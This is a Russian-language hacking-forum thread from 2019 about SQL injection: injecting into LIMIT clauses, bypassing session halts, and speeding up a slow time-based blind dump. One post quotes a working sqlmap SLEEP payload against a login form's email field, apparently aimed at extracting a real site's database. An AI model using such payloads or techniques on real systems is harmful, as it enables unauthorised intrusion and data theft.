HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2621  
Старый 04.06.2019, 23:31
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

Подскажите, есть ли на текущий момент вариант провести Mysql иньект в лимите, если версия Mysql > 5.6 ? Трюк с procedure analyse не прокатывает, но возможно есть ещё какие техники? Буду признателен, если кто подскажет.
 
Ответить с цитированием

  #2622  
Старый 09.06.2019, 02:17
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

 
Ответить с цитированием

  #2623  
Старый 19.06.2019, 10:08
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию

После каждого SQL запроса

Session halted.

Сессия остановлена,как можно это решить,вводить капчу каждый раз муторно
 
Ответить с цитированием

  #2624  
Старый 19.06.2019, 10:54
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Цитата:
Сообщение от madam  
madam said:

После каждого SQL запроса
Session halted.
Сессия остановлена,как можно это решить,вводить капчу каждый раз муторно
Все заголовки отлавливать и использовать, возможно CSRF токен мешает
 
Ответить с цитированием

  #2625  
Старый 20.06.2019, 15:09
AngelEyes
Guest
Сообщений: n/a
Провел на форуме:
1924

Репутация: 0
По умолчанию

Parameter: useremail (POST)

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI

Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)

Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))

[ERROR] invalid character detected. retrying..

[WARNING] increasing time delay to 4 seconds
 
Ответить с цитированием

  #2626  
Старый 20.06.2019, 17:11
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от AngelEyes  
AngelEyes said:

Parameter: useremail (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)
Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
[ERROR] invalid character detected. retrying..
[WARNING] increasing time delay to 4 seconds
если есть такое, вполне возможно есть и другие скули, поищите хорошо.
 
Ответить с цитированием

  #2627  
Старый 20.06.2019, 17:13
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от AngelEyes  
AngelEyes said:

Parameter: useremail (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)
Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
[ERROR] invalid character detected. retrying..
[WARNING] increasing time delay to 4 seconds
Oob
 
Ответить с цитированием

  #2628  
Старый 20.06.2019, 18:59
AngelEyes
Guest
Сообщений: n/a
Провел на форуме:
1924

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Oob
Если это ответ,то можно поподробней=)
 
Ответить с цитированием

  #2629  
Старый 20.06.2019, 19:02
AngelEyes
Guest
Сообщений: n/a
Провел на форуме:
1924

Репутация: 0
По умолчанию

Цитата:
Сообщение от RWD  
RWD said:

если есть такое, вполне возможно есть и другие скули, поищите хорошо.
Пара разных пейлоадов,пробовал через оба,но итог один и тот же
 
Ответить с цитированием

  #2630  
Старый 20.06.2019, 19:10
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от AngelEyes  
AngelEyes said:

Если это ответ,то можно поподробней=)
https://www.acunetix.com/blog/artic...ction-vulnerability-testing-added-acumonitor/
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ